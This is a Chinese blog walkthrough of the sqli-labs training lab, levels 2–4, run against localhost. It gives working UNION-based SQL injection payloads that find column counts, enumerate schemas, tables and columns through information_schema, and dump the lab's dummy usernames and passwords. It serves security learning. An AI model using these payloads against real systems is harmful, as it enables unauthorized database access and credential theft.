sqli-labs-master less02-04

sql注入0-4关只存在注入方式的区别

  第一关 ?id=1'--+  '

  第二关 ?id=1--+  

  第三关 ?id=1')--+  ‘)

  第四关 ?id=1")--+  ")

过程同 sqli-labs-master less01,此处只提供less02代码。

判断断sql注入类型

  http://localhost/sqli-labs-master/Less-2?id=1         结果正常

  http://localhost/sqli-labs-master/Less-1/?id=1'      报错

  http://localhost/sqli-labs-master/Less-1/?id=1'--+   报错

  结果:数字型注入

判断sql查询语句中的字段数:

  http://localhost/sqli-labs-master/Less-2/?id=1 order by 4   报错不存在

  http://localhost/sqli-labs-master/Less-2/?id=1 order by 3  成功显示

  结果:字段数为3

判断回显的字段数:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3

  结果:回显 2 和 3

利用回显字段位置爆库

获取数据库:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+

  结果:information_schema,challenges,dvwa,jokedb,mysql,pikachu,pkxss,security,test

获取security库的表:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+

  结果:emails,referers,uagents,users

获取security库的users表:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273

  结果:id,user,password

获取security库的users的字段信息:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(0x2d,id,username,password)) from security.users

  结果:1-Dumb-Dumb,2-Angelina-I-kill-you,3-Dummy-p@ssword,4-secure-crappy,5-stupid-stupidity,6-superman-genious,7-batman-mob!le,8-admin-admin,9-admin1-admin1,10-admin2-admin2,11-admin3-admin3,12-dhakkan-dumbo,14-admin4-admin4 

 

posted @   燕钰达  阅读(197)  评论(0编辑  收藏  举报
编辑推荐:
· 基于Microsoft.Extensions.AI核心库实现RAG应用
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
阅读排行:
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
点击右上角即可分享
微信分享提示